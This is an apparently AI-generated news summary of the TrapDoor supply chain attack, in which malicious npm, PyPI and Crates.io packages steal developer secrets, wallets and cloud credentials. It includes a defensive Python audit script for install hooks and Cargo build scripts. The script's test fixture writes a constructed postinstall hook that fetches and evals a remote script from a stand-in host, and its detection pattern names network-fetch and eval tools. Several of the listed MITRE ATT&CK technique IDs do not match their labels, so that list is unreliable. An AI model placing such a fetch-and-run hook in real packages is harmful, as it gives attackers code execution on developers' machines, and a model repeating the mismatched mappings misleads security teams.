TrapDoor Supply Chain Attack Spreads Credential-Stealing Malware via npm, PyPI, and CratesIO

The Hacker News25/05/2026, 05:59
Summary

AI-Generated

Key Points:

  • A coordinated software supply chain attack, codenamed TrapDoor, is distributing credential-stealing malware through npm, PyPI, and Crates.io, affecting over 384 versions of 34 malicious packages.
  • The attack targets developers in crypto, DeFi, Solana, and AI communities, aiming to steal sensitive information such as developer secrets, crypto wallets, and cloud credentials. The malware employs various techniques for persistence and lateral movement.
  • Security teams should immediately audit their development environments for the presence of these malicious packages, implement strict package validation processes, and educate developers on the risks associated with using third-party libraries.

Technical Details: The malware runs from npm postinstall hooks and from remote JavaScript payloads fetched and executed when the package is imported. In the Rust packages it uses a Cargo build script ("build.rs"), which runs automatically at build time, to trigger the malicious code.
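The audit the summary recommends can start with the two execution points it names. The Python below, an added example that is not from the article or from any vendor, walks a node_modules tree for npm lifecycle hooks and a Cargo vendor tree for crates carrying a build.rs; every package name, script and URL in it is constructed for the demo.

```python
"""Audit npm lifecycle hooks and Cargo build scripts in a local dependency tree."""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic only: a hook that reaches the network or evaluates code merits review.
NETWORK_OR_EVAL = re.compile(r"https?://|curl|wget|fetch\(|eval\(|new Function", re.I)


def find_npm_hooks(node_modules: Path):
    """Return (package, hook, command, suspicious) for every lifecycle script found."""
    findings = []
    for manifest in sorted(node_modules.rglob("package.json")):
        try:
            pkg = json.loads(manifest.read_text())
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or non-JSON manifest: skip, do not crash the audit
        for hook in LIFECYCLE_HOOKS:
            cmd = (pkg.get("scripts") or {}).get(hook)
            if cmd:
                findings.append((pkg.get("name", "?"), hook, cmd, bool(NETWORK_OR_EVAL.search(cmd))))
    return findings


def find_cargo_build_scripts(vendor: Path):
    """Return names of vendored crates that ship a build.rs (runs at cargo build time)."""
    return sorted(p.parent.name for p in vendor.rglob("build.rs") if (p.parent / "Cargo.toml").exists())


def demo():
    """Build a constructed tree with one benign and one suspicious package, then audit it."""
    root = Path(tempfile.mkdtemp())
    nm = root / "node_modules"
    (nm / "left-pad-ok").mkdir(parents=True)
    (nm / "left-pad-ok" / "package.json").write_text(json.dumps({"name": "left-pad-ok", "version": "1.0.0"}))
    (nm / "sol-helper-bad").mkdir()
    (nm / "sol-helper-bad" / "package.json").write_text(json.dumps({
        "name": "sol-helper-bad", "version": "0.0.1",
        # constructed: a hook that pulls a remote script at install time
        "scripts": {"postinstall": "node -e \"fetch('https://example.invalid/s.js').then(r=>r.text()).then(eval)\""}}))
    crate = root / "vendor" / "fast-hash-bad"  # constructed crate with a build script
    crate.mkdir(parents=True)
    (crate / "Cargo.toml").write_text('[package]\nname = "fast-hash-bad"\n')
    (crate / "build.rs").write_text("fn main() {}\n")
    return find_npm_hooks(nm), find_cargo_build_scripts(root / "vendor")


if __name__ == "__main__":
    hooks, crates = demo()
    for name, hook, cmd, suspicious in hooks:
        print(f"{'SUSPICIOUS' if suspicious else 'review'}: {name} {hook}: {cmd}")
    print("crates with build.rs:", crates)
```

Point `find_npm_hooks` and `find_cargo_build_scripts` at a real project's node_modules and vendor directories to list every hook and build script that needs a human look; a build.rs is normal for many crates, so the list is a review queue, not a verdict.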

MITRE ATT&CK Techniques:

  • T1071.001 - Application Layer Protocol: Web Protocols (Command and Control)
  • T1203 - Exploit Public-Facing Application (Initial Access)
  • T1046 - Network Service Discovery (Discovery)
  • T1053.001 - Scheduled Task/Job: Scheduled Task (Persistence)

IOCs Mentioned:

  • GitHub Pages domain: ddjidd564.github[.]io
